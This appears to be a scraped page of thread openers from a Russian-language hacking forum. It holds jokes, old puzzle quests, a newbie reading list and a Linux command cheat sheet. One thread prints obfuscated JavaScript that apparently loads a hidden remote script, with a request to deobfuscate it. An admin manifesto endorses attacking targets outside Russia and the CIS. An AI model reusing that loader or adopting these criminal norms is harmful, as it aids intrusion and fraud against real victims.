Chat

◀ Back

Мемчики!

Author: DildoFagins • 2020-08-16T10:21:39+0000 • Replies: 1K • Views: 641K
Тема для обмена и обсуждения мемасов про нас, кулхацеров, скрипткидисов,
аверов, форумных троллей и тд.
![Ht0pe8-Rwvq-I.jpg](https://xss.is/attachments/13200/)

Юмор

Author: TR1()N!X • 2005-05-10T10:21:27+0000 • Replies: 794 • Views: 484K
Туалетная бумага
(это не мой шедевр)

НАЗНАЧЕНИЕ, УСЛОВИЯ ЭКСПЛУАТАЦИИ И ТЕХНИЧЕСКИЕ ДАННЫЕ ИЗДЕЛИЯ
Туалетная бумага (арт. № 11315509651), в дальнейшем - ИЗДЕЛИЕ, предназначена
для удаления остатков процесса дефекации с внешнего края заднепроходного
отверстия, прилегающих к нему участков кожи и локально концентрированного на
данном участке тела волосяного покрова (в дальнейшем - места использования).
ПРИМЕНЕНИЕ
1\. Тщательно ознакомиться с настоящей инструкцией. Инструкция должна быть
закреплена винтами М6 в легкодоступном и хорошо освещенном месте в зоне прямой
видимости пользователя (пользователей).

2\. Рулон изделия расположить на уровне груди пользователя в слегка
горизонтальном положении.

3\. Произвести акт дефекации.

4\. Убедитесь в успешном завершении акта и в отсутствии позывов к его
продолжению (данный пункт важен для экономии и рационального пользования
изделием).

5\. Прямым поступательным движением правой руки вниз ухватить кончик
(изделия), а затем резким движением вверх и вправо приблизительно под углом 60
градусов к линии горизонта дернуть изделие, отмотав, таким образом, 700
миллиметров изделия (для удобства пользователя каждые 100 миллиметров изделия
маркированы перфорацией).

6\. Разнонаправляющим движением рук в горизонтальной плоскости произвести
разрыв ленты приблизительно между двумя ближайшими участками перфорации. Лица,
обладающие отсутствием одной из конечностей, производят манипуляции с изделием
с помощью острого режущего или рубящего инструмента (ножницы, столовый нож,
опасная бритва, топорик для разделки мяса). Соблюдайте меры предосторожности,
изложенные в соответствующих инструкциях, прилагаемых к данным изделиям.

Примечание. Не рекомендуется производить надрыв изделия по участкам перфорации
ввиду опасности нарушения и деформации поверхностного слоя волокнистой
структуры материала изделия.

7\. Сложить отрез изделия в виде гармошки (баяна), последовательно сгибая его
по участкам перфорации, получив изделие № 2 (см. рис. 1).

8\. Переложить в руку, наиболее удобную для пользователя.

9\. Приложить полученное в ходе предыдущих манипуляций изделие № 2 к месту
использования и, плотно прижав рукой к кожному покрову, произвести подтирочные
действия в межягодичном пространстве.

10\. Поместив использованное изделие в область зрения, в условиях хорошей
освещенности осмотреть наличествующий на нем мазок на предмет обнаружения яйца
глистов или признаков педикулеза. В случае обнаружения таковых набрать 03 и
поставить в известность соответствующие медицинские учреждения по месту
жительства. В противном случае повторить пункты 4-9 три-четыре раза.

11\. Чистой сухой рукой проверить качество очистки (межягодичное пространство
на ощупь должно быть сухо, слегка шероховато, края заднепроходного отверстия
хорошо протерты, волосяной покров пушист и легко доступен для прочесывания). В
случае наличия признаков некачественной подтирки (грязь под ногтями, резкий
специфический запах при обонятельном контроле и др.) произвести манипуляции,
описанные в п. 4-9, еще три-четыре раза.
МЕРЫ ПРЕДОСТОРОЖНОСТИ
1\. Не курить вблизи изделия.
2\. Не оставлять использованное изделие в местах культуры, отдыха и приема
пищи.
3\. Беречь от детей. Туалетная бумага - не игрушка, а средство гигиены!
4\. Не рекомендуется многократное использование изделия.



:lol2: :lol2: :lol2: :crazy: :blink: :P
![:D](data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7)
![:\)](data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7)
:crazy:

Деобфускация js

Author: top • 2023-08-25T17:27:45+0000 • Replies: 4 • Views: 181K
Помоги деобфусцировать js в читаемый вид

Code:Copy to clipboard



<!DOCTYPE html><html><head><script type="text/javascript">var a=['c8Knw6cvLw3DmxDDmQ==','w6Mhw6I=','TsK9w7B9RQ==','wpVswonCmcKT','WkbCggvCrw==','CcK1aUc5dw==','wrbCk2/CuSzCsA==','QcKnAMK6Zw==','GcKybkskZgkVAcOmYhp8','wqdrwrLCpcKq','LMO/WsONHw==','MCQDw7M=','wqEVwpHCjcOawpFUw5PDiW4CIMKiw67CksKWw64Zw54meQLDlsOr','wrnCpXTCnnRKw4tww5tgE3fDhE1Kwr40KcKYAMOM','V8KTw5RZb8OFw6M=','w5hCwoFKw74=','PsK4w7obaw==','dMOlwqvDh0k=','w4LDi1bChVI=','bMKQQMKJw7sxWcOQXsOMw4rCu8KNwo3CssOoagDDsxs=','w6QGRsOtw7c=','bMKQQMKJw7sxWcOQXsOMw7vCgMK9wr0=','Bx4+w60m','fHVXYxk=','woXDtlfCkAo=','K2VuBsKQ','aCLDmsOcw4s=','dcOtw4Iacw==','AMOAcMO/QwUHQ0fDg8On','I8ODwq/DusK4','VMO7QABg','w4XCvCLDlSI=','ccOfw5wU','RMOTwqfDtw7DusK9bxlPGcOew5JPWg==','Z8KdSn7Cuw==','w4fCvTNwwrg='];(function(b,c){var d=function(f){while(--f){b['push'](b['shift']());}};var e=function(){var f={'data':{'key':'cookie','value':'timeout'},'setCookie':function(l,m,n,o){o=o||{};var p=m+'='+n;var q=0x0;for(var r=0x0,s=l['length'];r<s;r++){var t=l[r];p+=';\x20'+t;var u=l[t];l['push'](u);s=l['length'];if(u!==!![]){p+='='+u;}}o['cookie']=p;},'removeCookie':function(){return'dev';},'getCookie':function(l,m){l=l||function(p){return p;};var n=l(new RegExp('(?:^|;\x20)'+m['replace'](/([.$?*|{}()[]\/+^])/g,'$1')+'=([^;]*)'));var o=function(p,q){p(++q);};o(d,c);return n?decodeURIComponent(n[0x1]):undefined;}};var g=function(){var l=new RegExp('\x5cw+\x20*\x5c(\x5c)\x20*{\x5cw+\x20*[\x27|\x22].+[\x27|\x22];?\x20*}');return l['test'](f['removeCookie']['toString']());};f['updateCookie']=g;var h='';var k=f['updateCookie']();if(!k){f['setCookie'](['*'],'counter',0x1);}else if(k){h=f['getCookie'](null,'counter');}else{f['removeCookie']();}};e();}(a,0xa1));var b=function(c,d){c=c-0x0;var e=a[c];if(b['mTboBj']===undefined){(function(){var h=function(){var k;try{k=Function('return\x20(function()\x20'+'{}.constructor(\x22return\x20this\x22)(\x20)'+');')();}catch(l){k=window;}return k;};var i=h();var j='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';i['atob']||(i['atob']=function(k){var l=String(k)['replace'](/=+$/,'');var m='';for(var n=0x0,o,p,q=0x0;p=l['charAt'](q++);~p&&(o=n%0x4?o*0x40+p:p,n++%0x4)?m+=String['fromCharCode'](0xff&o>>(-0x2*n&0x6)):0x0){p=j['indexOf'](p);}return m;});}());var g=function(h,l){var m=[],n=0x0,o,p='',q='';h=atob(h);for(var t=0x0,u=h['length'];t<u;t++){q+='%'+('00'+h['charCodeAt'](t)['toString'](0x10))['slice'](-0x2);}h=decodeURIComponent(q);var r;for(r=0x0;r<0x100;r++){m[r]=r;}for(r=0x0;r<0x100;r++){n=(n+m[r]+l['charCodeAt'](r%l['length']))%0x100;o=m[r];m[r]=m[n];m[n]=o;}r=0x0;n=0x0;for(var v=0x0;v<h['length'];v++){r=(r+0x1)%0x100;n=(n+m[r])%0x100;o=m[r];m[r]=m[n];m[n]=o;p+=String['fromCharCode'](h['charCodeAt'](v)^m[(m[r]+m[n])%0x100]);}return p;};b['tdwSju']=g;b['TahitG']={};b['mTboBj']=!![];}var f=b['TahitG'][c];if(f===undefined){if(b['rMHJhi']===undefined){var h=function(i){this['bFkfJz']=i;this['WgrkyW']=[0x1,0x0,0x0];this['vpkZSz']=function(){return'newState';};this['WRTZaF']='\x5cw+\x20*\x5c(\x5c)\x20*{\x5cw+\x20*';this['riFWZu']='[\x27|\x22].+[\x27|\x22];?\x20*}';};h['prototype']['HuUyYX']=function(){var i=new RegExp(this['WRTZaF']+this['riFWZu']);var j=i['test'](this['vpkZSz']['toString']())?--this['WgrkyW'][0x1]:--this['WgrkyW'][0x0];return this['yMxgRy'](j);};h['prototype']['yMxgRy']=function(i){if(!Boolean(~i)){return i;}return this['eRgUoW'](this['bFkfJz']);};h['prototype']['eRgUoW']=function(j){for(var k=0x0,l=this['WgrkyW']['length'];k<l;k++){this['WgrkyW']['push'](Math['round'](Math['random']()));l=this['WgrkyW']['length'];}return j(this['WgrkyW'][0x0]);};new h(b)['HuUyYX']();b['rMHJhi']=!![];}e=b['tdwSju'](e,d);b['TahitG'][c]=e;}else{e=f;}return e;};var e=function(){var i={};i[b('0xc','P^(q')]=function(l,m){return l!==m;};i[b('0x6','ZM4i')]=b('0x15','P&^d');var j=i;var k=!![];return function(l,m){var n={};n[b('0x9',']Ter')]=function(q,r){return j[b('0x1a','qA]z')](q,r);};n[b('0x0','(zYI')]=j[b('0x8','XYY#')];var o=n;var p=k?function(){if(m){if(o[b('0x7','k92f')](o[b('0x3','KQ0C')],o['DStDh'])){var s=m[b('0xd','*gNx')](l,arguments);m=null;return s;}else{var q=m[b('0x23','acMW')](l,arguments);m=null;return q;}}}:function(){};k=![];return p;};}();var f=e(this,function(){var i={};i[b('0xe','S]5I')]=b('0x20','bL%D');i['YLnFP']=b('0x1f','CQ6w');var j=i;var k=function(){var l=k['constructor'](j[b('0x5','0VAU')])()[b('0x21','P&^d')](j[b('0x11','B3cI')]);return!l['test'](f);};return k();});f();var g=function(i){return document[b('0x4','V7b[')](i);},h=function(i){var j={};j[b('0x1c','CQ6w')]=function(l,m){return l(m);};j[b('0xa','8b89')]=function(l,m){return l(m);};var k=j;k[b('0x12','*#yw')](g,'a')['value']=i;k[b('0x1d','BJCw')](g,'c')[b('0x18','KRnS')]();};window[b('0x19','OSaY')]=function(){var i={};i['NLCpZ']='script';i[b('0x1','e@mV')]=b('0x10','(zYI');i[b('0x22','u^wM')]=b('0x1e','0VAU');var j=i;var k=document[b('0x1b','KRnS')](j[b('0x17','Uf&Y')]);k[b('0xf','8b89')]=j[b('0x16','Rx!9')];k[b('0x14','Op(n')]=b('0x13','bMy&');document[b('0x2','V7b[')](j['ZqRVV'])[0x0][b('0xb','S09G')](k);};</script> </head></html>
<!-- a padding to disable MSIE and Chrome friendly error page -->
<!-- a padding to disable MSIE and Chrome friendly error page -->
<!-- a padding to disable MSIE and Chrome friendly error page -->
<!-- a padding to disable MSIE and Chrome friendly error page -->
<!-- a padding to disable MSIE and Chrome friendly error page -->
<!-- a padding to disable MSIE and Chrome friendly error page -->

что делает этот код?

Uinomania 6.0

Author: SM@x • 2005-06-04T07:24:10+0000 • Replies: 574 • Views: 121K
**UINomania 6.0**

_Квест by SM@x_



**Разработчик(и):** SM@x
**Тестер(ы):** SM@x
**Спонсор(ы):** Winux, SM@x, AlexSoft
**Приз(ы):** Главный приз: суперприватный джойнер от [AlexSoft](http://www.ag-
dev.com/alexsoft/joiner.bmp). Помимо этого в течение прохождения Вас ждут
бонусы в виде 6-тизнаков, кто успел - тот и забрал.

**Задание:** Какого числа земля налетит на небесную ось?

**Начало:** [здесь](http://www.xss.is/index.php?topic=4021)

**Для прохождения Вам могут понадобится:**
1\. ICQ клиент
2\. Браузер веб-страниц
3\. WinRar
4\. Просмоторщик jpg, gif файлов
5\. Total commander
6\. Проигрыватель mp3-файлов

**Полезные ссылки:**
\- <http://1cq.ru/tools/sneak.php>
\- <http://www.lingvo.ru/lingvo/Translate.asp>

* Это основные тулзы, возможно Вам понадобится что-то и еще.

Примечания:
1\. Фразы типа "квест сложный" или "слишком простой", а также "не могу найти
файл..пароль" или "файл не качается" не обсуждаются!
2\. Подсказки будут даваться по мере прохождения.
3\. В асю за подсказками не стучать, в противном случае - лишаетесь права в
дальнейшем прохождении квеста.
4\. После прохождения квеста автор имеет право задать победителю вопрос по
прохождению.
5\. Квест считается пройденным только после объявления автором победителя.

В квесте могут принимать все зарегистрированные пользователи форума, причем
прежде чем начать проходить квестер должен отпостить в этом топике фразу: "I
start quest"; если будет дан ответ, но у победителя не будет стартовой фразы,
квест продолжается!

Мой вам совет: не торопитесь, будьте внимательны, дерзайте!

Обсуждаем здесь...


[.:: l0g071p41k ::.](http://winux.com.ru/uinomania/6/l0g071p41k.swf)​

Новогодний квест "Спаси Деда Мороза"

Author: SM@x • 2006-01-06T12:43:06+0000 • Replies: 495 • Views: 102K
Сегодня в 20-00 по Москве стартует увлекательный квест "**Спаси Деда Мороза**
". Вас ждут загадки, головоломки, ловушки, веселые картинки, бонусы и главный
приз уин **272779** победителю квеста.
Более подробно обо всем Вы узнаете чуть позднее...
Участвовать смогут все!

Манифест. Мы против работы по РУ!

Author: admin • 2019-11-14T16:09:39+0000 • Replies: 211 • Views: 93K
**Манифест**

Мы, Дамага, **против работы по РУ/СНГ**. Не работаем сами и другим не
рекомендуем.

* каждому "работничку" по РУ мы шлем лучи негатива;
* помним о собственной безопасности - работа по РУ ее нивелирует;
* повторяем тезис "Кто работает по RU, к тому приходят по утру" \- доказан многократно;
* помним о патриотизме;
* к работе по РУ не относятся товары/услуги, позволяющие повысить уровень личной безопасности (например, соксы, дебетки и т.д.)


В целях пропаганды, ловите бейджик:
![](https://xss.is/files/dontworkru.jpg)

Код для установки в подпись:

Code:Copy to clipboard



[URL='https://xss.is/threads/33196/'][IMG]https://xss.is/files/dontworkru.jpg[/IMG][/URL]


Можно ставить себе в подпись. Если вы - дизайнер, поддержите инициативу,
отрисуйте еще что-нибудь в таком же стиле и добавляйте в общую коллекцию.

Новичок не может без помощи (советы опытных)

Author: CKAP • 2018-11-07T21:54:02+0000 • Replies: 232 • Views: 86K
По просьбе трудящихся и находящихся в депрессии возвращаем тему.

Обращаясь к новичкам. В любом учении нужна теория. Не столько как для решения
конкретной задачи, как для понимания природы вещей в целом. Это нужно
понимать.

Большинство людей устроены так что, им хочется видеть результат вот прям
сразу, а потом вникать в детальки. На этих людей и арретирован этот пост.
Начнём пошаговый экскурс. Сразу скажу, что эти технологии немного староваты,
но принципы не особо изменились. Как курс бой скаута сгодиться.

******************************************************************************
1) Работа с вертуалками и знакомство с другими ОС.
Книга Жукова + те самые две ос, что в книге. Одна ОС Атакер другая Дефендер. В
сети их найти сейчас проблематично, но чего не сделаешь ради подрастающего
поколения.

Spoiler: Жуков Ю. В. -Основы веб-хакинга. Нападение и защита (2-е изд.) - 2012

<https://yadi.sk/d/37hIoDZ_zfhk2>

Spoiler: DVL_1.5_Infectious_Disease.iso

<https://yadi.sk/d/5lVkD9-7zfj63>

Spoiler: bt4-final.iso

<https://yadi.sk/d/FIEgUZHGzfjJx>

\---------
В этот же столбец как приятное чтиво доп книга - Хакинг в WEB. И 24 смертных
греха.

Spoiler: Хакинг в WEB

<https://yadi.sk/d/519Ol18-46nrX>

Spoiler: 24 смертных греха

<https://yadi.sk/d/_syHlkufzjZPq>

+
Из нового...

Spoiler: Книги по сетевой безопасности

[Анализ защищённости и мониторинг компьютерных сетей](https://yadi.sk/i/zgeh-
DrLA0Vuwg)
[Искусство взлома и защиты систем](https://yadi.sk/d/-tHw9z3z3UDJ6x)
[Лаборатория хакера](https://yadi.sk/i/NBC61gQi3UDHe7)

**************_**************
2)

Spoiler: Радуем своё ЧСВ. Хитрости, тонкости и прочие приколюшки.

[Хитрости в Windows XP](https://yadi.sk/i/0X_MXc3LjmR4i)
[Хитрости в Windows 7](https://yadi.sk/i/-byjJqfXzffQs)
[Недокументированные и малоизвестные возможности
WindowsXP](https://yadi.sk/d/_OClaq0Fzfffu)

**************_**************
3) Не останавливаемся на достигнутом. Администрирование.

Spoiler: Самоучитель сис админа

<https://yadi.sk/d/dkfNCU79zfgGW>

Spoiler: Реестр

[Реестр Windows XP трюки и секреты](https://yadi.sk/d/VX1krzuIzfgRB)
[Реестр Windows XP справочник профессионала](https://yadi.sk/d/Lbb1EpAbzfggn)

==============================================================================
4)

Spoiler: Основы ОС

[ОС системы Столлингс](https://yadi.sk/i/To0YAi57zfgwM)
[Современные ОС](https://yadi.sk/d/Gl4cxN3Pzfh7c)
[Основы ОС](https://yadi.sk/d/OY4ap9qGzfhGi)

\----------------------------------------------------------------------------------------------------
PSи. По идеи ниже должны идти языки и тд. Но это уже другая история. Тем не
менее, дабы не делать просто старый бэкап темы..

Spoiler: Баш HTML книга

<https://yadi.sk/d/yqWv6SHqlLfdgg>

Spoiler: Пых7 от Котерова

<https://yadi.sk/i/C3TGZluQ-hX_Yg>

Spoiler: Самоучитель Пых7 от Игорёши + набор учебных файлов

<https://yadi.sk/d/YKE2WhqGfzzvEg>

Spoiler: Ужиг

[Старье](https://yadi.sk/i/LfQXXdzDBvGA8A)
[Почти свежак](https://yadi.sk/i/7GZmWCZk3UDJWC)

Spoiler: Читаемый код, или программирование как искусство

<https://yadi.sk/i/nhbpX6xN9IY7PA>

Spoiler: Олимпиадные задачи по программированию

<https://yadi.sk/i/iHqx2r7WeVADww>


Спёк..

Spoiler: Спёк

<https://yadi.sk/i/5E_XRcMQ33E2wA>


Рекомендую следующие онлайн-площадки с интерактивными курсами:
[Codecademy](https://www.codecademy.com/)

Spoiler

Что вы получите? Практику! Много практики! Самое то для понимания основ,
возможности "прощупать", поэкспериментировать. Не всегда в теории можно
описать что-либо полностью, также как и не всегда можно понять эту теорию.


[Coursera](https://www.coursera.org/)

Spoiler

В данном случае можно получить мощную теоретическую базу от мастеров своего
дела - профессоров, практиков. Помимо мощной теоретической базы, можно будет
увидеть примеры, а также по прохождению лекций необходимо будет проходить
тесты, которые подтвердят освоение материала и позволят сфокусироваться на
слабых местах. Там присутствуют весьма интересные курсы с возможностью не
только повторить реализованное в лекции, но и подумать своей головой,
практикуя своё мастерство в деле.


[EDX](https://www.edx.org/)
[Stepic](https://stepik.org/)


Spoiler: Убунту\Дебиан - команды консоли

![](/proxy.php?image=https%3A%2F%2Fi98.fastpic.ru%2Fbig%2F2018%2F1109%2F27%2Ff32e285a69dbd185cff42c186d2a3e27.png&hash=b90eda7df9ecdcdff8fad62d696a2417)
**Популярные
Системные команды
man** \- эта команда выводит справочную информация по нужной вам команде,
такую как синтаксис, ключи, описание и т.д. Синоним **info** _.**sudo** \-
переход в режим суперпользователя (после первой команды **sudo** необходимо
ввести пароль пользователя).
Для запуска в терминале команды с правами администратора просто наберите перед
ней **sudo**. _Пример:**sudo** **reboot**_

**reboot** \- перезагрузка системы
**poweroff** \- выключение компьютера
**reset** \- очищает окно терминала, работает даже если вы потеряли курсор
**passwd** \- позволяет пользователю поменять свой пароль, а суперпользователю
- поменять пароль любого зарегистрированного в
системе пользователя

**free** \- получить информацию об оперативной памяти (всего, занято,
свободно, в swap).

**************************__**************************
**Команды для работы с файлами**

**pwd** – показать текущий каталог
**cd** \- переход в заданную папку
**ls** \- показывает список файлов текущей папки, с ключом **-l** показывает
дополнительные сведения о файлах

**cp** \- копирование файлов/папок
**mv** \- перемещение файлов/папок
**rm** \- удаление файлов/папок, с ключем **-R** удаляет и все вложенные папки
**mkdir** \- создать папку
**rmdir** \- удаление пустой папки
**chmod** \- изменить права доступа к файлу.

******************__******************
**Команды для работы с пакетами**

**apt-get update** \- обновление информации о пакетах из репозиториев
****apt-get upgrade** \- **обновление всех пакетов
**
**apt-get clean** \- **очищает локальный репозиторий, т.е. удаляет всё, что вы
ранее **скачивали.** Очень полезно иногда прогонять для очистки диска.

****apt-get autoremove** -** удаление ранее скачаных, но более ненужных
пакетов
****apt-get remove** \- **удаление пакета из системы, с сохранением его
конфигурационных файлов
****apt-get purge** \- **удаление пакета со всеми зависимостями
****apt-get install** -** установка пакета.

**************___**************
**Управление процессами**

**ps** \- показывает текущие активные процессы
**kill** \- команда отправляет сигнал прекращения работы тому или иному
процессу, используется для прекращения работы зависшего приложения
**killall** \- прекращение работы всех процессов, соответствующих заданным
параметрам
**top** \- интерактивный список текущих процессов, отсортированных по %
использования центрального процессора.

**************__**************
**Сетевые команды**

**ifconfig** \- выводит информацию о сетевых интерфейсах (в windows
используется ipconfig)
**pppoeconf** \- комманда настройки подключения к интернет
**ping host** – пропинговать _host_ и вывести результат
**whois domain** – получить информацию whois для domain
**route host -** показать путь прохождения пакетов, от вас к _host_
**wget file** – скачать _file_
**ssh user@host** – подключится к host как user
**ufw enable** \- включить фаервол
**ufw disable** \- выключить фаервол.

************____************
**Прочее команды терминала**

**clear** \- очищает окно терминала
**nano** **-** текстовый редактор файлов. есть аналог - **gedit**
**uname -a** \- выводит информацию об операционной системе
**who** \- показывает, кто сейчас в системе
**whoami** \- показывает под каким именем зарегистрирован текущий пользователь
**finger user** – показать информацию о _user_.

*********************** **Словарь****************
**Системная информация**

**arch** отобразить архитектуру компьютера
**uname -m** _отобразить архитектуру компьютера_
**uname -r** отобразить используемую версию ядра
**dmidecode -q** показать аппаратные системные компоненты - (SMBIOS / DMI)
**hdparm -i /dev/hda** вывести характеристики жесткого диска
**hdparm -tT /dev/sda** протестировать производительность чтения данных с
жесткого диска
**cat /proc/cpuinfo** отобразить информацию о процессоре
**cat /proc/interrupts** показать прерывания
**cat /proc/meminfo** проверить использование памяти
**cat /proc/swaps** показать файл(ы) подкачки
**cat /proc/version** вывести версию ядра
**cat /proc/net/dev** показать сетевые интерфейсы и статистику по ним
**cat /proc/mounts** отобразить смонтированные файловые системы
**lspci -tv** показать в виде дерева PCI устройства
**lsusb -tv** показать в виде дерева USB устройства
date вывести системную дату
**cal 2007** вывести таблицу-календарь 2007-го года
**date 041217002007.00** установить системные дату и время ММДДЧЧммГГГГ.СС
(МесяцДеньЧасМинутыГод.Секунды)
**clock -w** сохранить системное время в BIOS
============================
**Остановка системы

shutdown -h now** Остановить систему
**init 0** _Остановить систему_
**telinit 0** _Остановить систему_
**shutdown -h hours:minutes &** запланировать остановку системы на указанное
время
**shutdown -c** отменить запланированную по расписанию остановку системы
**shutdown -r now** перегрузить систему
**reboot** _перегрузить систему_
**logout** выйти из системы
=====================
**Файлы и директории**

**cd /home** перейти в директорию '/home'
**cd ..** перейти в директорию уровнем выше
**cd ../..** перейти в директорию двумя уровнями выше
**cd** перейти в домашнюю директорию
**cd ~user** перейти в домашнюю директорию пользователя user
**cd** \- перейти в директорию, в которой находились до перехода в текущую
директорию
**pwd** показать текущюю директорию
**ls** отобразить содержимое текущей директории
**ls -F** отобразить содержимое текущей директории с добавлением к именам
символов, храктеризующих тип

**ls -l** показать детализированое представление файлов и директорий в текущей
директории
**ls -a** показать скрытые файлы и директории в текущей директории
**ls _[0-9]_** показать файлы и директории содержащие в имени цифры
**tree** показать дерево файлов и директорий, начиная от корня (/)
**lstree** _показать дерево файлов и директорий, начиная от корня (/)_
**mkdir dir1** создать директорию с именем 'dir1'
**mkdir dir1 dir2** создать две директории одновременно
**mkdir -p /tmp/dir1/dir2** создать дерево директорий
**rm -f file1** удалить файл с именем 'file1'
**rmdir dir1** удалить директорию с именем 'dir1'
**rm -rf dir1** удалить директорию с именем 'dir1' и рекурсивно всё её
содержимое
**rm -rf dir1 dir2** удалить две директории и рекурсивно их содержимое
**mv dir1 new_dir** переименовать или переместить файл или директорию
**cp file1 file2** сопировать файл file1 в файл file2
**cp dir/* .** копировать все файлы директории dir в текущую директорию
**cp -a /tmp/dir1 .** копировать директорию dir1 со всем содержимым в текущую
директорию
**cp -a dir1 dir2** копировать директорию dir1 в директорию dir2
**ln -s file1 lnk1** создать символическую ссылку на файл или директорию
**ln file1 lnk1** создать "жёсткую" (физическую) ссылку на файл или директорию
**touch -t 0712250000 fileditest** модифицировать дату и время создания файла,
при его отсутствии, создать файл с указанными датой и временем (YYMMDDhhmm)
============================================================
**Поиск файлов**

**find / -name file1** найти файлы и директории с именем file1. Поиск начать с
корня (/)
**find / -user user1** найти файл и директорию принадлежащие пользователю
user1. Поиск начать с корня (/)

**find /home/user1 -name "*.bin"** Найти все файлы и директории, имена которых
оканчиваются на '. bin'. Поиск начать с '/ home/user1'

**find /usr/bin -type f -atime +100** найти все файлы в '/usr/bin', время
последнего обращения к которым более 100 дней

**find /usr/bin -type f -mtime -10** найти все файлы в '/usr/bin', созданные
или изменённые в течении последних 10 дней

**find / -name *.rpm -exec chmod 755 '{}' ;** найти все фалы и директории,
имена которых оканчиваются на '.rpm', и изменить права доступа к ним

**find / -xdev -name "*.rpm"** найти все фалы и директории, имена которых
оканчиваются на '.rpm', игнорируя съёмные носители, такие как cdrom, floppy и
т.п.

**locate "*.ps"** найти все файлы, сожержащие в имени '.ps'. Предварительно
рекомендуется выполнить команду 'updatedb'

**whereis halt** показывает размещение бинарных файлов, исходных кодов и
руководств, относящихся к файлу 'halt'

**which halt** отображает полный путь к файлу 'halt'
=====================================
**Монтирование файловых систем**

**mount /dev/hda2 /mnt/hda2** монтирует раздел 'hda2' в точку монтирования
'/mnt/hda2'. Убедитесь в наличии директории-точки монтирования '/mnt/hda2'

**umount /dev/hda2** размонтирует раздел 'hda2'. Перед выполнением, покиньте
'/mnt/hda2'
**fuser -km /mnt/hda2** принудительное размонтирование раздела. Применяется в
случае, когда раздел занят каким-либо пользователем
**umount -n /mnt/hda2** выполнить размонитрование без занесения информации в
/etc/mtab. Полезно когда файл имеет атрибуты "только чтение" или недостаточно
места на диске

**mount /dev/fd0 /mnt/floppy** монтировать флоппи-диск
**mount /dev/cdrom /mnt/cdrom** монтировать CD или DVD
**mount /dev/hdc /mnt/cdrecorder** монтировать CD-R/CD-RW или DVD-R/DVD-RW(+-)
**mount -o loop file.iso /mnt/cdrom** смонтировать ISO-образ
**mount -t vfat /dev/hda5 /mnt/hda5** монтировать файловую систему Windows
FAT32
**mount -t smbfs -o username=user,password=pass //winclient/share /mnt/share**
монтировать сетевую файловую систему Windows (SMB/CIFS)

**mount -o bind /home/index.php?dn=userprg /var/ftp/user** "монтирует"
директорию в директорию (binding). Доступна с версии ядра 2.4.0. Полезна,
например, для предоставления содержимого пользовательской директории через ftp
при работе ftp-сервера в "песочнице" (chroot), когда симлинки сделать
невозможно.
====================================
**Дисковое пространство**

**df -h** отображает информацию о смонтированных разделах с отображением
общего, доступного и используемого пространства _(Прим.переводчика. ключ -h
работает не во всех *nix системах)_

**ls -lSr |more** выдаёт список файлов и директорий рекурсивно с сортировкой
по возрастанию размера и позволяет осуществлять постраничный просмотр

**du -sh dir1** подсчитывает и выводит размер, занимаемый директорией 'dir1'
_(Прим.переводчика. ключ -h работает не во всех *nix системах)_

**du -sk * | sort -rn** отображает размер и имена файлов и директорий, с соритровкой по размеру

**rpm -q -a --qf '%10{SIZE}t%{NAME}n' | sort -k1,1n** показывает размер используемого дискового пространства, занимаемое файлами rpm-пакета, с сортировкой по размеру (fedora, redhat и т.п.)

**dpkg-query -W -f= '${Installed-Size;10}t${Package}n' | sort -k1,1n** показывает размер используемого дискового пространства, занимаемое файлами deb-пакета, с сортировкой по размеру (ubuntu, debian т.п.)

=======================
**Пользователи и группы**

**groupadd group_name** создать новую группу с именем group_name
**groupdel group_name** удалить группу group_name
**groupmod -n new_group_name old_group_name** переименовать группу
old_group_name в new_group_name

**useradd -c "Nome Cognome" -g admin -d /home/user1 -s /bin/bash user1**
создать пользователя user1, назначить ему в качестве домашнего каталога
/home/user1, в качестве shell'а /bin/bash, включить его в группу admin и
добавить комментарий Nome Cognome

**useradd user1** создать пользователя user1
**userdel -r user1** удалить пользователя user1 и его домашний каталог
**usermod -c "User FTP" -g system -d /ftp/user1 -s /bin/nologin user1**
изменить атрибуты пользователя

**passwd** сменить пароль
**passwd user1** сменить пароль пользователя user1 (только root)
**chage -E 2005-12-31 user1** установить дату окончания действия учётной
записи пользователя user1

**pwck** проверить корректность системных файлов учётных записей. Проверяются
файлы /etc/passwd и /etc/shadow

**grpck** проверяет корректность системных файлов учётных записей. Проверяется
файл/etc/group

**newgrp [-] group_name** изменяет первичную группу текущего пользователя.
Если указать "-", ситуация будет идентичной той, в которой пользователь вышил
из системы и снова вошёл. Если не указывать группу, первичная группа будет
назначена из /etc/passwd
==========================================
**Выставление/изменение полномочий на файлы**

**ls -lh** просмотр полномочий на файлы и директории в текущей директории
**ls /tmp | pr -T5 -W$COLUMNS** вывести содержимое директории /tmp и разделить вывод на пять колонок

**chmod ugo+rwx directory1** добавить полномочия на директорию directory1
ugo(User Group Other)+rwx(Read Write eXecute) - всем полные права. Аналогичное
можно сделать таким образом "chmod 777 directory1"

**chmod go-rwx directory1** отобрать у группы и всех остальных все полномочия
на директорию directory1.

**chown user1 file1** назначить владельцем файла file1 пользователя user1
**chown -R user1 directory1** назначить рекурсивно владельцем директории
directory1 пользователя user1

**chgrp group1 file1** сменить группу-владельца файла file1 на group1
**chown user1:group1 file1** сменить владельца и группу владельца файла file1
**find / -perm -u+s** найти, начиная от корня, все файлы с выставленным SUID
**chmod u+s /bin/binary_file** назначить SUID-бит файлу /bin/binary_file. Это
даёт возможность любому пользователю запускать на выполнение файл с
полномочиями владельца файла.

**chmod u-s /bin/binary_file** снять SUID-бит с файла /bin/binary_file.
**chmod g+s /home/public** назначить SGID-бит директории /home/public.
**chmod g-s /home/public** снять SGID-бит с директории /home/public.
**chmod o+t /home/public** назначить STIKY-бит директории /home/public.
Позволяет удалять файлы только владельцам

**chmod o-t /home/public** снять STIKY-бит с директории /home/public
======================================================
**Специальные атрибуты файлов**

**chattr +a file1** позволить открывать файл на запись только в режиме
добавления
**chattr +c file1** позволяет ядру автоматически сжимать/разжимать содержимое
файла.
**chattr +d file1** указавет утилите dump игнорировать данный файл во время
выполнения backup'а

**chattr +i file1** делает файл недоступным для любых изменений:
редактирование, удаление, перемещение, создание линков на него.

**chattr +s file1** позволяет сделать удаление файла безопасным, т.е.
выставленный атрибут s говорит о том, что при удалении файла, место,
занимаемое файлом на диске заполняется нулями, что предотвращяет возможность
восстановления данных.

**chattr +S file1** указывает, что, при сохранении изменений, будет
произведена синхронизация, как при выполнении команды sync

